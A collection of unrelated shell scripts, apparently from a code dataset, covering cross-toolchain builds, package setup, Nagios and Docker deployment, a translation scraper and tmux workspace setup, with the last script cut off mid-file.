        BUILD_CC="gcc -I$BUILDGCC_TOOLS_DIR/AppleDevTools/include" \
        CC="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-gcc \
        CXX="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-g++ \
        AR="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ar \
        RANLIB="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ranlib \
        READELF="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-readelf \
        --prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --host=$TARGET_PLATFORM \
        --exec-prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --with-binutils="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM/bin \
        --with-headers="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include \
        --enable-add-ons \
        --disable-shared \
        libc_cv_ssp=yes \
        libc_cv_predef_stack_protector=no \
        libc_cv_z_relro=yes \
        libc_cv_forced_unwind=yes \
        libc_cv_c_cleanup=yes \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Placeholder stubs.h lets install-headers run before libc exists.
        mkdir -p "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include/gnu
        touch "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/include/gnu/stubs.h
        [[ $? == 0 ]] && make install-headers 2>&1 | tee make-install-headers-stdout.log
        # Bug fix: "$?" here was tee's status, not make's; use PIPESTATUS[0].
        [[ ${PIPESTATUS[0]} == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ GLIBC Headers failed------------------------------------------------------------------------"
    exit 1
fi
# --- GLIBC: full C library build for the target ----------------------------
echo "*-*-*-*------------------------------------------------------------------ GLIBC ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-headers-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done ]]; then
    "$BUILDGCC_BUILDSCRIPTS"/Extract "$GLIBC_SOURCES_DIR" || exit 1
    rm -rf "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
    mkdir "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
    cd "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build
    #cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c.orig "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_main.c
    #cp -n "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c.orig "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR/sunrpc/rpc_scan.c
    # install_root="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORMTmp \
    # BUILD_CC="gcc -I$BUILDGCC_TOOLS_DIR/AppleDevTools/include" \
    ../$GLIBC_SOURCES_DIR/configure \
        BUILD_CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CC="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-gcc \
        CXX="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-g++ \
        AR="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ar \
        RANLIB="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-ranlib \
        READELF="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/$TARGET_PLATFORM-readelf \
        --prefix= \
        --build=$(../$GLIBC_SOURCES_DIR/scripts/config.guess) \
        --host=$TARGET_PLATFORM \
        --with-headers="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/usr/include \
        --with-binutils="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin \
        --disable-multilib \
        --enable-add-ons \
        --enable-shared \
        libc_cv_forced_unwind=yes \
        libc_cv_c_cleanup=yes \
        libc_cv_predef_stack_protector=yes \
        2>&1 | tee configure-stdout.log
    if [[ -f config.status ]]; then
        # Bug fix: check the make stage (PIPESTATUS[0]), not tee's "$?".
        make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install_root="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM install 2>&1 | tee make-install-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ GLIBC failed------------------------------------------------------------------------"
    exit 1
fi
# --- GCC cross stage 2: full C/C++ compiler against the freshly built glibc -
echo "*-*-*-*------------------------------------------------------------------ GCC cross 2 ------------------------------------------------------------------------"
if [[ -f "$BUILDGCC_BUILD_DIR"/$GLIBC_SOURCES_DIR-build/make_sucessfully.done && ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]]; then
    #Source must have been extracted and pacthed in GCC cross 1 step
    # Comment out two SCSI ioctl constants libsanitizer no longer finds.
    cp -n "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc.orig
    sed "739s|unsigned IOCTL_SCSI_IOCTL_TAGGED_DISABLE = SCSI_IOCTL_TAGGED_DISABLE|//unsigned IOCTL_SCSI_IOCTL_TAGGED_DISABLE = SCSI_IOCTL_TAGGED_DISABLE|" "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc.orig \
        | sed "740s|unsigned IOCTL_SCSI_IOCTL_TAGGED_ENABLE = SCSI_IOCTL_TAGGED_ENABLE|//unsigned IOCTL_SCSI_IOCTL_TAGGED_ENABLE = SCSI_IOCTL_TAGGED_ENABLE|" \
        >"$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR/libsanitizer/sanitizer_common/sanitizer_platform_limits_posix.cc
    rm -rf "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
    mkdir "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
    cd "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build
    ../$GCC_SOURCES_DIR/configure \
        CC="gcc -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        CXX="g++ -I${BUILDGCC_TOOLS_DIR}/AppleDevTools/include" \
        --target=$TARGET_PLATFORM \
        --prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --with-local-prefix="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --with-sysroot="$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM \
        --enable-languages=c,c++ \
        --program-suffix=$PROGRAM_SUFFIX \
        --enable-werror=no \
        --enable-poison-system-directories \
        --with-arch=armv7-a \
        --with-float=hard \
        --enable-__cxa_atexit \
        --enable-libmudflap \
        --enable-libgomp \
        --enable-libssp \
        --enable-libquadmath \
        --enable-libquadmath-support \
        --enable-libsanitizer \
        --enable-threads=posix \
        --enable-gold \
        --disable-multilib \
        --enable-c99 \
        --enable-long-long \
        --with-gmp="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-mpfr="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-mpc="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-isl="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-cloog="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        --with-libelf="$BUILDGCC_BUILD_DIR"/$HOST_PLATFORM \
        2>&1 | tee configure-stdout.log
    #--with-headers=$BUILDGCC_SYSTEM_HEADER_DIR <-- needed to copy includes in prefix/target/sys-include. Otherwise, configure failed saying preprocessor /lib/cpp can't run
    if [[ -f config.status ]]; then
        # Bug fix: check the make stage (PIPESTATUS[0]), not tee's "$?".
        make $BUILDGCC_MAKEJOBS 2>&1 | tee make-stdout.log
        [[ ${PIPESTATUS[0]} == 0 ]] && make install 2>&1 | tee make-install-stdout.log
        # looks like arm-none-linux-gnueabi-g++ is missing. Don't know why.
        # NOTE(review): the copied name hard-codes GCC 4.9.3; presumably it
        # should track $PROGRAM_SUFFIX -- verify before bumping GCC.
        [[ ${PIPESTATUS[0]} == 0 ]] && cp "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/g++-4.9.3 "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM/bin/arm-none-linux-gnueabi-g++
        [[ $? == 0 ]] && touch make_sucessfully.done
    fi
fi
if [ ! -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]
then
    echo "*-*-*-*------------------------------------------------------------------ GCC cross 2 failed------------------------------------------------------------------------"
    exit 1
fi
# Final step: rewrite library paths in the finished toolchain and drop the
# top-level completion marker.
if [[ -f "$BUILDGCC_BUILD_DIR"/$GCC_SOURCES_DIR-cross2-build/make_sucessfully.done ]]; then
    if ! update_all_lib_path "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM; then
        exit 1
    fi
    if ! update_all_lib_path -r "$BUILDGCC_BUILD_DIR"/$TARGET_PLATFORM; then
        exit 1
    fi
    cd "$BUILDGCC_BUILD_DIR"
    touch make_sucessfully.done
    echo *-*-*-*------------------------------------------------------------------ Finished ------------------------------------------------------------------------
fi
| true
|
a8437334f2db4a8a1071685f4e35651d555d548e
|
Shell
|
kobigurk/mina-scripts
|
/find_holes.sh
|
UTF-8
| 588
| 3.28125
| 3
|
[] |
no_license
|
# Scan the mina sidecar container log for "New tip" block heights and report
# any heights missing between the lowest and highest seen (the "holes").
LIST=$(docker logs mina_mina-sidecar_1 2>&1 | grep "New tip" | awk '{print $4}' | tr -d '\.')
MIN=$(echo "$LIST" | jq -s min)
MAX=$(echo "$LIST" | jq -s max)
# NOTE: if no tips were logged, MIN/MAX are null and seq fails (as before).
EXPECTED=$(seq $MIN $MAX)
# Bug fix: uniq only removes *adjacent* duplicates, so it must run AFTER
# sort (the original "uniq | sort -n" left non-adjacent duplicates in).
echo "$LIST" | tr " " "\n" | sort -n | uniq > /tmp/mina-1
echo "$EXPECTED" | tr " " "\n" | sort -n | uniq > /tmp/mina-2
# Lines present only in the expected sequence are the missing heights.
DIFF=$(diff --new-line-format="%L" --unchanged-line-format="" /tmp/mina-1 /tmp/mina-2)
RATIO="$(cat /tmp/mina-1 | wc -l)/$(cat /tmp/mina-2 | wc -l)"
echo "min, max, count different/total, percentage: $MIN, $MAX, $RATIO, $(echo "scale=2; 100*$RATIO" | bc -l)"
echo "differences:"
echo "$DIFF"
| true
|
2bede0a125ea7a869449de452029e98a3ce88b1f
|
Shell
|
fmidev/rack
|
/src/configure.sh
|
UTF-8
| 4,409
| 3.890625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Markus.Peura@fmi.fi
# Interactive configure helper for Rack: detects include/library directories
# for the required libraries and records the answers in install-rack.cnf.

CONF_FILE='install-rack.cnf'

echo "Creating/updating Rack config file '$CONF_FILE'"
echo "(Optionally edited later.)"

# Re-use (and back up) an existing config so previous answers become defaults.
if [ -f "$CONF_FILE" ]; then
    cp -vi $CONF_FILE $CONF_FILE.bak
    source $CONF_FILE
fi

echo

# Start a fresh config file, stamped with author and date.
echo -n "# Conf by $USER, " > $CONF_FILE
date >> $CONF_FILE
echo >> $CONF_FILE
# Given a file (like 'geotiff.h'), returns its directory.
# Among several paths, selects the last one.
#
# ARGS: (include|lib) <variable-name> <file>
#
function guess_dir(){

    local TYPE=$1 # include or lib
    local KEY=$2
    local FILE=$3

    local P=''
    local i

    # Step 1: try standard system locations first; stop at the first hit.
    for i in /{usr,var}{,/local}/${TYPE}{,64,/${FILE%.*},/lib${FILE%.*},/x86_64-linux-gnu} ; do
        echo "... $i/$FILE"
        if [ -f "$i/$FILE" ]; then
            P=$i/$FILE
            break
        fi
    done

    if [ "$P" != '' ]; then
        echo "# $KEY: found standard path: $P"
    else
        # Step 2: fall back to locate(1); keep the last non-documentation hit.
        local cmd="locate --regex '$FILE$'" # [1-9]?
        echo "# $KEY: trying: $cmd"
        eval $cmd
        P=`locate --regex ${FILE}$ | grep -F -v /doc | tail -1`
    fi

    # Strip filename
    P=${P%/*}

    local P_old
    P_old=${!KEY}    # indirect read instead of "eval P_old=\$$KEY"
    echo "# Previous value: $KEY=$P_old"
    # Bug fix: the original 'eval $KEY="$P"' broke on paths containing spaces
    # (and evaluated path contents); printf -v assigns safely.
    printf -v "$KEY" '%s' "$P"
    echo
}
# Utility to change default variables (above)
# ARGS: <variable-name> <prompt-text>
#
# Prompts (readline-editable, pre-filled with the current value) for a new
# value of the named variable, then appends the prompt text as a comment and
# "name='value'" to $CONF_FILE.
function ask_variable(){

    local key=$1
    local X
    X=${!key}    # indirect read instead of "eval X=\$$key"
    shift

    echo "$*"

    read -e -i "$X" -p " $key=" $key
    X=${!key}

    echo "# $*" >> "$CONF_FILE"
    echo "$key='$X'" >> "$CONF_FILE"
    echo >> "$CONF_FILE"
    echo
}
# Emit a warning on stdout when the given directory does not exist.
function warn_if_unfound(){
    local dir=$1
    [ -d "$dir" ] || echo "Warning: $dir not found"
}
# Warn when the given directory is missing, then try to unset it.
# NOTE(review): "unset $1" attempts to unset a *variable named after the path
# argument* (e.g. "unset /var/opt"), which is invalid -- presumably the intent
# was to unset the variable whose value was passed; verify against callers
# (none visible in this file).
function unset_if_unfound(){
    if [ ! -d "$1" ]; then
        echo "Warning: $1 not found"
        unset $1
    fi
}
# Todo recode
# Main flow: seed CCFLAGS/LDFLAGS from pkg-config where possible, fall back
# to guess_dir + interactive confirmation per library, then record finals.
echo 'Automagically detecting CCFLAGS and LDFLAGS'
#guess_include_dir HDF5_INCLUDE hdf5.h
#guess_include_dir HDF5_LIB libhdf5.a
#guess_include_dir PROJ_INCLUDE proj_api.h
#guess_include_dir GEOTIFF_INCLUDE geotiff.h

prefix=${prefix:-'/var/opt'} # or '.'?

echo
#echo "Accept or modify the directories detected above:"
#echo
#ask_variable HDF5_INCLUDE "Hierarchical Data Format (HDF5), include directory"
#warn_if_unfound $HDFROOT
#ask_variable PROJ_INCLUDE "PROJ.4 projection library, include directory"
#warn_if_unfound $PROJ_INCLUDE
#ask_variable GEOTIFF_INCLUDE "GeoTIFF include directory (leave empty if GeoTIFF not used)"

echo "# Checking if 'pkg-config' utility is available"
PKGC=''
if pkg-config --version > /dev/null ; then
    echo -e "# Calling 'pkg-config' for setting CCFLAGS and LDFLAGS"
    # pkg-config warnings here can be discarded
    PKGC="pkg-config --silence-errors"
fi

CCFLAGS='-std=gnu++11 -fopenmp' # ${GEOTIFF_INCLUDE:+"-I$GEOTIFF_INCLUDE"}
LDFLAGS='-std=gnu++11 -fopenmp'

#for i in hdf5 proj png ${GEOTIFF_INCLUDE:+'tiff'} ${GEOTIFF_INCLUDE:+'geotiff'}; do
#for i in hdf5 proj_api png tiff geotiff; do
for i in hdf5 proj png tiff geotiff; do

    if [ "$PKGC" != '' ]; then
        # An assignment's status is its command substitution's status, so the
        # "&& continue" chain advances only if pkg-config knows the package.
        # Attempt #1 ...
        CCFLAGS="$CCFLAGS `$PKGC --cflags $i`" && LDFLAGS="$LDFLAGS `$PKGC --libs $i`" && continue
        # Attempt #2 ...
        CCFLAGS="$CCFLAGS `$PKGC --cflags lib$i`" && LDFLAGS="$LDFLAGS `$PKGC --libs lib$i`" && continue
        echo -e "# $i:\t Not found with 'pkg-config' "
    fi

    # Fallback: detect the include dir, let the user confirm/override it.
    key=${i^^}_INCLUDE
    guess_dir 'include' ${key} $i.h
    ask_variable ${key} "Include dir for $i"
    eval value=\$${key}
    if [ ! -e "$value" ]; then
        echo -e "# $i:\t warning: not found"
        continue
    fi
    #VALUE=${value:+"-I$value"}
    CCFLAGS="$CCFLAGS -I$value"

    # Then the matching library dir.
    i=${i%_*} # proj_api => proj
    key=${i^^}_LIB
    guess_dir lib ${key} lib$i.so
    ask_variable ${key} "Library dir for $i"
    eval value=\$${key}
    if [ -e "$value" ]; then
        LDFLAGS="$LDFLAGS -L$value -l$i"
        #LDLIBS="$LDLIBS -l$i"
    else
        echo -e "# $i:\t warning: not found"
    fi

done

echo "Final values: "
ask_variable CCFLAGS "Include paths"
ask_variable LDFLAGS "Library paths"
#ask_variable LDLIBS "Libraries"
ask_variable prefix 'Directory prefix for binary executable: ${prefix}/bin/'
warn_if_unfound $prefix

# GeoTiff is optional: enabled iff a GeoTIFF lib dir was found above.
echo "# GeoTiff support (optional)" >> $CONF_FILE
USE_GEOTIFF='NO'
USE_GEOTIFF=${GEOTIFF_LIB:+"YES"}
echo "USE_GEOTIFF=${USE_GEOTIFF}" >> $CONF_FILE

echo
echo "Created $CONF_FILE with contents:"
echo
cat $CONF_FILE

echo "Updated '$CONF_FILE'"
echo
echo "Continue with ./build.sh"
| true
|
6d7b7fbdd5526ac131815ea4006c55d0831d7c70
|
Shell
|
migueldvb/arch4edu
|
/rocm-comgr/PKGBUILD
|
UTF-8
| 1,345
| 2.859375
| 3
|
[] |
no_license
|
# Maintainer: Ranieri Althoff <ranisalt+aur at gmail dot com>
# PKGBUILD metadata for rocm-comgr (ROCm Code Object Manager library).
pkgname=rocm-comgr
pkgdesc='Radeon Open Compute - compiler support'
pkgver=3.3.0
pkgrel=1
arch=('x86_64')
url='https://github.com/RadeonOpenCompute/ROCm-CompilerSupport'
license=('custom')
makedepends=(cmake git llvm-roc)
# Source pinned to the release tag; the commented patches were needed by
# earlier releases and are kept for reference (their checksums too, below).
source=(
  "rocm-comgr::git+https://github.com/RadeonOpenCompute/ROCm-CompilerSupport#tag=rocm-$pkgver"
  # "rocm-comgr-2.6.0-find-clang.patch"
  # "rocm-comgr-2.6.0-find-lld-includes.patch"
  # "rocm-comgr-2.8.0-dependencies.patch"
)
sha256sums=('SKIP')
# 'f04ff936e87a888264e9c0920c9356a85b18e9ec9d729fcf53f83755c171828c'
# '4571b16961f15249e8cc8b9a9ae7f0863600345aa5e95959192149eacdb01d2e')
# Apply any *.patch entries from source() to the comgr subtree.
prepare() {
  cd "$srcdir/rocm-comgr/lib/comgr"
  local entry base
  for entry in "${source[@]}"; do
    # Strip the "name::url" prefix, then any directory components.
    base="${entry%%::*}"
    base="${base##*/}"
    if [[ $base = *.patch ]]; then
      msg2 "Applying patch $base..."
      patch -Np1 -i "$srcdir/$base"
    fi
  done
}
# Configure and compile comgr against the ROCm LLVM/Clang in /opt/rocm.
build() {
  # Let cmake use ccache when the makepkg "ccache" buildoption is enabled.
  if check_buildoption "ccache" "y"; then
    CMAKE_FLAGS="-DROCM_CCACHE_BUILD=ON"
  fi
  # $CMAKE_FLAGS is intentionally unquoted: when ccache is disabled the
  # variable is unset and must expand to nothing.
  cmake $CMAKE_FLAGS \
    -DCMAKE_BUILD_TYPE=Release \
    -DCMAKE_INSTALL_PREFIX=/opt/rocm \
    -DClang_DIR=/opt/rocm/lib/cmake/clang \
    "$srcdir/rocm-comgr/lib/comgr"
  make
}
# Install the built files into $pkgdir (staged via DESTDIR).
package() {
  DESTDIR="$pkgdir/" make -C "$srcdir" install
}
| true
|
046855a2e14122866bd48db587827bcccb32d154
|
Shell
|
wesleip/custom
|
/customworkstation.sh
|
UTF-8
| 1,781
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# Workstation bootstrap: clears stale apt locks, installs base packages,
# adds third-party repositories/applications, then upgrades the system.
## Remove any stale apt locks ##
sudo apt-get clean ; sudo rm /var/lib/dpkg/lock-frontend ; sudo rm /var/cache/apt/archives/lock;
## Refresh the package indexes ##
sudo apt update -y &&
## Install base packages ##
sudo apt install filezilla git snapd &&
## Install Snap packages ##
sudo snap install --classic code &&
## Install external packages ##
#--- Brave ---#
sudo apt install apt-transport-https curl &&
sudo curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg &&
echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg arch=amd64] https://brave-browser-apt-release.s3.brave.com/ stable main"|sudo tee /etc/apt/sources.list.d/brave-browser-release.list &&
sudo apt update &&
sudo apt install brave-browser ;
#--- Notion ---#
wget https://notion.davidbailey.codes/notion-linux.list ;
sudo mv notion-linux.list /etc/apt/sources.list.d/notion-linux.list;
sudo apt update && sudo apt install notion-desktop;
#--- Qbittorrent --#
sudo add-apt-repository ppa:qbittorrent-team/qbittorrent-stable ;
sudo apt-get update ;
sudo apt-get install qbittorrent ;
#--- Zoom ---#
wget https://zoom.us/client/latest/zoom_amd64.deb -O zoom.deb ;
sudo apt install ./zoom.deb ;
#--- BalenaEtcher ---#
# NOTE(review): apt-key is deprecated on current Ubuntu releases, and
# dl.bintray.com has been discontinued -- this repository likely no longer
# resolves; verify and replace with Etcher's current install method.
echo "deb https://dl.bintray.com/resin-io/debian stable etcher" | sudo tee /etc/apt/sources.list.d/etcher.list ;
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 379CE192D401AB61 ;
sudo apt-get update ;
sudo apt-get install etcher-electron ;
## Full system upgrade and cleanup ##
sudo apt update && sudo apt dist-upgrade -y && sudo apt autoclean -y && sudo apt autoremove -y &&
## Done ##
echo "Finalizado"
| true
|
94e8155cebbb222842c526e323904efe293cd8ec
|
Shell
|
brisbane/nrpe
|
/templates/passive_check_yumupdate.erb
|
UTF-8
| 2,056
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Passive Nagios check (sent via NSCA) for outstanding yum package updates.
# NSCA states sent: 0 = OK (none), 1 = WARNING (<30), 2 = CRITICAL (>=30).
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
PROGNAME=`basename $0`
nagiosbox=<%= nagios_server %>
send_nsca_config=/etc/nagios/send_nsca.cfg
print_usage() {
    echo "Usage: $PROGNAME"
}
print_help() {
    echo -e "This plugin checks whether there are outstanding package updates with yum.\n"
    exit 0
}
case "$1" in
    --help)
        print_help
        exit 0
        ;;
    -h)
        print_help
        exit 0
        ;;
    *)
        # Run yum, all from cache, minimal errors, minimal debug output
        list=$(yum -e0 -d0 check-update)
        # An empty list still produces one line from wc -l, hence "-eq 1" = OK.
        status=$(echo "${list}" | wc -l)
        if test ${status} -eq 1; then
            echo -e ${HOSTNAME}"\tYUM updates\t0\tYUM OK - no outstanding updates\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
            exit 0
        elif test ${status} -lt 30; then
            # Check number of updates required for individual repos
            shortlist=$(echo "${list}" | awk 'NR>1 {repo[$3]++} ; END {for (n in repo) {print n, repo[n]}}')
            echo -e -n ${HOSTNAME}"\tYUM updates\t1\tWARNING - pending updates: "${shortlist}"\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
            exit 1
        elif test ${status} -ge 30; then
            # Bug fixes: the original tested "-gt 30", so exactly 30 lines fell
            # through to UNKNOWN; and the NSCA state field said 1 despite the
            # CRITICAL text and "exit 2".
            shortlist=$(echo "${list}" | awk 'NR>1 {repo[$3]++} ; END {for (n in repo) {print n, repo[n]}}')
            echo -e -n ${HOSTNAME}"\tYUM updates\t2\tCRITICAL - pending updates: "${shortlist}"\n" | /usr/sbin/send_nsca -H ${nagiosbox} -c ${send_nsca_config}
            exit 2
        else
            echo "UNKNOWN - error getting yum status"
            exit 3
        fi
        ;;
esac
| true
|
01c244ca40aed8cea97d7f279602fc4d5ec30144
|
Shell
|
hngr18/translate
|
/scripts/translateFrom.sh
|
UTF-8
| 504
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Translate a term by scraping Bing search's inline translator widget.
# Usage: translateFrom.sh [term] [from-language] [to-language]
# Defaults: Serbian "Здраво" -> English.
[[ $1 = '' ]] && term="Здраво" || term=$1
[[ $2 = '' ]] && from="serbian" || from=$2
[[ $3 = '' ]] && to="english" || to=$3
user_agent='Mozilla/5.0 (Linux; Linux 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019; en-US)'
# Percent-encode every byte of the query "<term>+<from>+to+<to>":
# od dumps hex bytes, tr prefixes each with '%', xargs/printf re-joins them.
encQuery=$(echo -e $term+$from+to+$to | od -An -tx1 | tr ' ' % | xargs printf "%s")
translateResponse=$(curl -H "User-Agent: $user_agent" -s https://www.bing.com/search\?q=$encQuery)
# Extract the translated text from the tta_tgt <span>.
# NOTE(review): this scrapes Bing's markup and breaks whenever the page
# structure changes -- there is no API contract here.
echo $translateResponse | grep -oP '(?<=<span id="tta_tgt">)[^<]+'
| true
|
f003b6c9767a27e464fa7e22da72c550b3c7ee50
|
Shell
|
gabmartinez/theater-backend
|
/.docker/deploy.sh
|
UTF-8
| 354
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Build the theater-service image, replace any running container with a
# fresh one from the new image.
image="theater-service"
# Build from the Dockerfile kept under .docker/
docker build --file=.docker/Dockerfile -t "$image" .
# Stop a previously started container, ignoring "not running" errors
docker stop "$image" || true
# Launch the freshly built image, detached, with its env file
docker run --rm --env-file=.docker/.env -d --name "$image" -p 5001:8080 "${image}:latest"
| true
|
8a168312141dc46c26ee5bfa8c03fa26affb4aab
|
Shell
|
Interana/examples
|
/oomkiller/memoryeater_t7_cgroups_m3xlarge.sh
|
UTF-8
| 282
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# OOM-killer stress driver: registers this shell in the "interana" memory
# cgroup, then repeatedly launches pairs of detached memoryeater_and_kill
# workers (sized for an m3.xlarge, per the filename).
MY_PID=$$
echo Adding my pid to cgroup : $MY_PID
# Children inherit the cgroup membership, so the workers are constrained too.
echo $MY_PID | sudo tee /sys/fs/cgroup/memory/interana/cgroup.procs
# 100 rounds x 2 workers, 30s apart; the numeric args to memoryeater_and_kill
# are opaque here (presumably sizes/durations) -- see that binary.
for i in $(seq 1 100); do for j in $(seq 1 2); do (./memoryeater_and_kill 10 300 20 50 > memoryeater_and_kill.$i$j.log 2>&1 &) ; done ; sleep 30; done
| true
|
381d3232656c798d5b0a56d9327173fdfc47b9ed
|
Shell
|
bor-attila/fatbox
|
/scripts/26-sphinxsearch.sh
|
UTF-8
| 583
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
# Provisioning step: install Sphinx search 3.3.1 into ~/sphinx, rename the
# ODBC driver section, and expose mssql-tools on the vagrant user's PATH.
echo "Installing sphinxsearch ..."
# NOTE(review): no error checking -- a failed download leaves a broken
# install; the version is also pinned to a specific 3.3.1 tarball.
wget http://sphinxsearch.com/files/sphinx-3.3.1-b72d67b-linux-amd64.tar.gz -O sphinx.tar.gz
tar -xf sphinx.tar.gz
rm sphinx.tar.gz
mv sphinx-3.3.1 ~/sphinx

## Set SQL server driver name ##
# Duplicate the last 4 lines of odbcinst.ini under a "[SQL Server]" header.
sudo sh -c 'echo "[SQL Server]" > /tmp/odbc'
sudo sh -c "tail -n 4 /etc/odbcinst.ini >> /tmp/odbc"
sudo sh -c "cat /tmp/odbc >> /etc/odbcinst.ini"
sudo rm -f /tmp/odbc

#add mssql-tools to vagrant user
echo 'export PATH="$PATH:/opt/mssql-tools/bin"' >> ~/.bash_profile
echo 'export PATH="$PATH:/opt/mssql-tools/bin"' >> ~/.bashrc
#source ~/.bashrc
| true
|
f423177566ca1e7029ccf7b9c12b3c7cf26a6d5c
|
Shell
|
b-berry/lg-scripts
|
/start-desktop.sh
|
UTF-8
| 1,789
| 3.640625
| 4
|
[] |
no_license
|
# TMUX Start Desktop Session
# Configures displays via xrandr, (re)creates a "desktop" tmux session with a
# fixed set of windows, and attaches to it in a new xfce4-terminal.
TMUX_NAME="desktop"

XTEST=$(DISPLAY=:0 xrandr | grep -c " connected")
echo "Running xrandr test: $XTEST"

case $XTEST in
    1)
        echo "...Found single display, setting up default workspace."
        xrandr --output eDP1 --mode 1920x1080 --pos 0x0 --rotate normal --output HDMI1 --off --output DP1 --off --output VIRTUAL1 --off
    ;;
    2)
        echo "...Found multiple displays connected, setting up default dual workspace."
        xrandr --output eDP1 --mode 1920x1080 --pos 0x0 --rotate normal --output HDMI1 --mode 1680x1050 --pos 1920x0 --rotate normal --output DP1 --off --output VIRTUAL1 --off
    ;;
    *)
        # Typo fix: message previously read "Abording!".
        echo "FAIL: xrandr test. Aborting!" && exit 1
    ;;
esac

# Test for existing active session; has-session exits 1 when it is absent.
tmux has-session -t $TMUX_NAME 2>/dev/null
if [ "$?" -eq 1 ]; then
    echo "Building tmux: ${TMUX_NAME}"
    # Window 1 creates the session; 3/4/5 get dedicated names/dirs; anything
    # else (window 2) falls through to a plain window in $HOME.
    for i in {1..5}; do
        case $i in
            1) tmux -q new-sess -d -s $TMUX_NAME &&\
               tmux new-window -t "${TMUX_NAME}:${i}"
            ;;
            3) cd $HOME/src
               echo "...Creating window: SRC"
